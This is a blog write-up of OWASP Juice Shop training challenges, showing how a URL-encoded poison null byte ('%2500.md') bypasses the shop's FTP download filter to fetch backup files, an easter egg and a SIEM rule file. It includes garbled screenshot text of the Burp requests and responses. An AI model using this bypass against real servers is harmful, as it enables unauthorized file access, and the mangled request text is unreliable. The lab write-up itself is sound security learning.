Information Security

Hacking OWASP’s Juice Shop Pt. 38: Poison Null Byte + 4 Others

Posted on by codeblue04

Challenge 1: 

Name: Poison Null Byte

Description: Bypass a security control with a Poison Null Byte to access a file not meant for your eyes.

Difficulty: 4 star

Category: Improper Input Validation

Expanded Description: https://pwning.owasp-juice.shop/part2/improper-input-validation.html

Challenges 2-5: 

Name: Easter Egg, Forgotten Developer Backup, Forgotten Sales Backup, and Misplaced Signature File

Tools used:

Burp, FoxyProxy

Resources used:

URL Encoding Table

Methodology:

The Poison Null Byte challenge is one of my favorites, because it’s such a simple trick that opens up so many seemingly closed doors on the FTP page. First, we need to know what the restrictions are on what we can and can’t download.

<img src="https://curiositykillscolby.files.wordpress.com/2020/11/image-144.jpeg?w=392&quot; alt="Response Headers Raw Render Pretty Actions V H-rrp/l.1 403 Forbidden Access-Cont rol -Allow-Origin: T -Type-options: nosniff SAMEORIGIN Feature-policy: payment 'self' Content -Type: text 'html; charset=utf-8 7 Vary: Accept -Encoding Date: Thu, OS Nov 2020 GMT Connection: close _O Content -Length: 19 <meta charset='utf-8 > Error: Only . md and .pdf files are allowed!

OK, so only .md and .pdf files can be downloaded. Fair enough. But by using a URL encoded null byte (%2500), it’s possible to bypass this restriction. Basically what we’re doing here is saying “I want file X.gg”, and letting the null byte do two things. First, it allows you to add new file extensions to GET requests to bypass the filetype restriction. Second, it serves as a break between the intended filename and any added file extension so that the correct file is downloaded.

The key is to put that URL encoded null byte at the end of the file extension, then add “.md” after it. Then, download all of the things! Seriously, download everything but the quarantined malware. The rest of the images in this post will be which files lead to challenge solutions.

Request Params Headers Actions ISON web Tokens GET /ftp/eastere.gg%2soo.md HTTP/I.I Host: local host 3000 User-Agent: MoziIIa/S.O (X 11; Linux x86 64; rv. 78.0) Gecko,'20100101 Firefox,'78.o 4 Accept: text 'html , application/xhtml +xml , application/xml ; q=O. 9, image/webp, I/ * ; q=O.8 -Language: en-lJS, en; q=O.S Accept -Encoding: gzip, deflate 7 Connection: close Referer: http•//localhost : 3000/ ftp Cookle: language=en; welcomebanner status=dismiss; cookieconsent status=dismiss, 7ShDt mlZsmlJj HZuLhwT4F8fASvt xi Of n SI guzzhveczMfI e SXL SuNqhQEt 4zIIYs9a LVAH8p CSas Vx f mwl ey ZXNz1iwi ZGFOYS16eyJpZC16M9 ESMj Ij o i Y'ARt ah'4iLCJkz,Nx1eGvub2t1 b i 161: zxQi oi dG12ZS16dHJ1 MSOwNSAywozooowNy Awoj Awliwi ZGVsZXR1 ZEF01j f swi ah'F01j ox Nj AONj Azi_cJ ehw•wfkifft 7LohedmdUIU74 g82 6mkEU49SZj hG3_cxwgADZXAF1tRcs-mX1xhK7VUQZXVr8s0FbM8DwMd, Upgrade-Insecure-Requests
Response Headers Pretty Render 200 0K Actions V Access-Cont rol -Allow-Origin: X-Content -Type-options: nosniff X-Frame-options: SAMEORIGIN Feature-policy: payment self' Accept -Ranges: bytes Cache-Cont rot: public, max-age=O Last -Modified: Mon, 14 sep 2020 08:01 GMT 9 ETag: n,' '144-1748ba27d20 Content -Type: application/ octet -st ream Content -Length: Il 324 Date: Thu, OS Nov 2020 Gl•rr 12 Connection: close Congratulations, you found the easter eggi - The incredibly funny developers Oh' wait, this isn't an easter egg at all! It 's just a boring text file! The real easter egg can be found here 24 L2d1ci9xcm1 m L 251 ci9mYi9zaGFhbC9ndXJsL3V2cS9uYS9ybmZncmUvcnROL2p2Z3V2YS9ndX1vcmsmZ3J1 Good luck, egg hunter!
You successfully solved a challenge: Easter Egg (Find the hidden easter egg.) You successfully solved a challenge: Poison Null Byte (Bypass a security control with a Poison Null Byte to access a file not meant for your eyes.) x x
Request w Params Pretty Headers Actions v ISON web Tokens GET /ftp/coupons 2013. mdl HI-rp/l.l Host: local host 3000 User-Agent: MoziIIa/S.O (X 11; Linux x86 64; rv. 78.0) Gecko,'20100101 Firefox,'78.o 4 Accept: text 'html , application/xhtml +xml , application/xml ; q=O. 9, image/webp, i/ I; q=O.8 S Accept -Language: en-lJS, Accept -Encoding: gzip, deflate 7 Connection: close Referer: http://localhost : 3000/ ftp Cookie: language=en; welcomebanner status=dismiss; cookieconsent status=dismiss; continueCode= xrh3t11vsoioWH2uah9tDTeFmfj sxt Eisf89wYukkhbzc9mf1 y salUXZuE7h xzlb tpPcQa- ey ey ZXNz1iwi dxrn cm shbßl_l: ESMj Ij o i Y'AR-t bi161i1s1mxhc3RMb2( zxQi oi d Gl 2ZS16dHJ1 YXRI ZEF01j oi M: MSOwNSAywoz0DowNy 400TYgKz Awoj Awliwi ZGVsZXR1 ZEF01j f 9wi ah'F01j ox Nj AONj EOTAzl_CJ1 e HAi oj E2MDQ2t eh"fkifft 7LohedmdUIU74 g82 6mkEU49SZj hGs_cxwgADZXAF1tRcs-mX1xhK7VUQZXVr8s0FbM8DwMd3GZue9 9va2cL[ Upgrade-Insecure-Requests
<img src="https://curiositykillscolby.files.wordpress.com/2020/11/image-146.jpeg?w=341&quot; alt="Response Headers P retty Render 200 0K Actions Access-Cont rol -Allow-Origin: X-Content -Type-options: nosniff 4 OX-Frame-options: SAMEORIGIN Feature-policy: payment 'self' Accept -Ranges: bytes Cache-Cont rot: public, max-age=O Last -Modified: Mon, 14 sep 2020 08:01 GMT n,' '83-1748ba27d20 Content -Type: application/ octet -st ream Content -Length: 131 Date: Thu, OS Nov 2020 Gt•rr 12 Connection: close n <MibgC7sn 16 mWS#gC7sn 011VigC7sn 17 k#pDI gC7sn 18 oil] pgC7sn 19 n ( XRvgC7sn 20 n ( XLt gC7sn 21 q:
You successfully solved a challenge: Forgotten Sales Backup (Access a salesman's forgotten backup file.) X
Request Raw Params Pretty Headers Actions "SON web Tokens GET / ftp/package.json.bak%2SOO.md HIT P/ 1.1 Host: local host 3000 User-Agent: MoziIIa/S.O (X 11; Linux x86 64; rv. 78.0) Gecko,'20100101 Firefox,'78.o 4 Accept: text 'html , application/xhtml +xml , application/xml ; q=O. 9, image/webp, q=O.8 S Accept -Language: en-lJS, Accept -Encoding: gzip, deflate 7 Connection: close Referer: http://localhost : 3000/ ftp Cookie: language=en; welcomebanner status=dismiss; cookieconsent status=dismiss, cont xrh3t11vsoioWH2uah9tDTeFmfj sxt Eisf89wYukkhbzc9mf1 ysa1uxzuE7hr8t xzlb zowkHSDCNQsJXf ey ZXNz1iwi ZGFOYS16eyJpZC16MSW1 ESMj Ij o i Y'NRt b i 16111 zxQi oi d Gl 2ZS16dHJ1 AwliwiZGvsZXR1 ZEF01j pudnxsf9wia',NF01j oxNj AONj EONTAzLCJ1 e eh"fkifft 7LohedmdUIU74 g82 6mkEU49SZj hGs_cxwgADZXAF1tRcs-mX1xhK7VUQZXVr8s0FbM8DwMdsc Upgrade-Insecure-Requests
Response Headers PretO' Render 200 0K Actions 12 Access-Cont rol -Allow-Origin: X-Content -Type-options: nosniff X-Frame-options: SAMEORIGIN Feature-policy: payment 'self' Accept -Ranges: bytes Cache-Cont rot: public, max-age=O Last -Modified: Mon, 14 sep 2020 08:01 GI•TT " 114b -1748ba27d20 Content -Type: application/ octet -st ream Content -Length: 4427 Date: Thu, OS Nov 2020 23: 43:24 Gl•rr Connection: close 'name 'juice-shop 6. 2. O- SNAPSHOT' version 'description An intentionally insecure JavaScript Web Application 'homepage "http• //owasp-juice.shop author' '8jörn Kimminich owasp.org/index.php/lJser:8j oern Kimminich) 'cont ributors '8jörn Kimminich' '8joern Kimminich' 'bjoern.kimminich' 'Jannik Hollenbach' Aashish683 greenkeeper[bot]' agrawaIarpit14", 'Ma rcRIer' CaptainFreak Supratik Das , aaryanIO , "m411cs , ' -112934' Josh Grossman Aashish Singh' "Timo Pagel scar26 'Martin Rock-Evans , Alejandro Saenz omerlh' private true,
You successfully solved a challenge: Forgotten Developer Backup (Access a developer's forgotten backup file.) X
Request Params pretty Headers Actions ISON web Tokens ET / ftp/suspicious errors.ymI%2SOO. mdl HIT P/ I. I Host: local host 3000 User-Agent: MoziIIa/S.O (X 11; Linux x86 64; rv. 78.0) Gecko,'20100101 Firefox,'78.o 4 Accept: text 'html , application/xhtml +xml , application/xml ; 9, image/webp, I/ * ; S Accept -Language: en-lJS, Accept -Encoding: gzip, deflate 7 Connection: close Referer: http // I Ocal host 3000/ ftp Cookie: language=en; welcomebanner status=dismiss; cookieconsent status=dismiss, I xrh3t11vsoioWH2uah9tDTeFmfj sxt Eisf89wYukkhbzc9mf1 ysa1UXZuE7hr8t xzlb zl_twkHSDCNQs ZXNz1iwi ESMj Ij o i Y'ARt ah'4iLCJkz,Nx1eGvub2t1 b i 16 zxQi oiliLCJpc0Fj dG12ZS16dHJ1 MSOwNSAyr•rrozooowNy Awoj Awliwi ZGVsZXR1 ZEF01j p u d',Nxsf9wi ah'F01j ox Nj AONj EOWAzL_c eh"fkifft 7LohedmdUIU74 g82 6mkEU49SZj hG3_cxwgADZXAF1tRcs-mX1xhK7VUQZXVr8s0FbM8DwM Upgrade -Insecure -Requests
Response Headers Render Pretty Raw 200 0K Actions Access-Cont rol -Allow-Origin: 1 X-Content -Type-options: nosniff X-Frame-options: SAMEORIGIN Feature-policy: payment 'self' Accept -Ranges: bytes Cache-Cont rot: public, max-age=O Last -Modified: Mon, 14 sep 2020 08:01 GI•TT 9 a-rag: n,' '2ds-1748ba27d20 Content -Type: text/yaml; charset=UTF- I Content -Length: 723 Vary: Accept -Encoding Date: Thu, OS Nov 2020 GMT Connection: close title: Suspicious error messages specific to the application description: Detects error messages that only occur from tampering with or attacking the application author: ajoern Kimminich logsource category: application product: nodejs service: errorhandler detection. keywords '810cked illegal activity with does not exist Only files are allowed 'File names cannot contain forward slashes 'l_lnrecognized target URL for redirect: I 828 customer complaints via file upload have been deprecated for security 'Infinite loop detected Detected an entity reference loop condition: keywords level: low reasons
You successfully solved a challenge: Misplaced Signature File (Access a misplaced SIEM signature file.) X

Prevention and Mitigation Strategies:

OWASP Input Validation Cheat Sheet

Lessons Learned: 

Nothing. I’ve always liked the poison null byte, ever since I looked up why the YouTube channel Null Byte (where I spent/spend a lot of time) chose its name.

Leave a Reply

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Cancel

Connecting to %s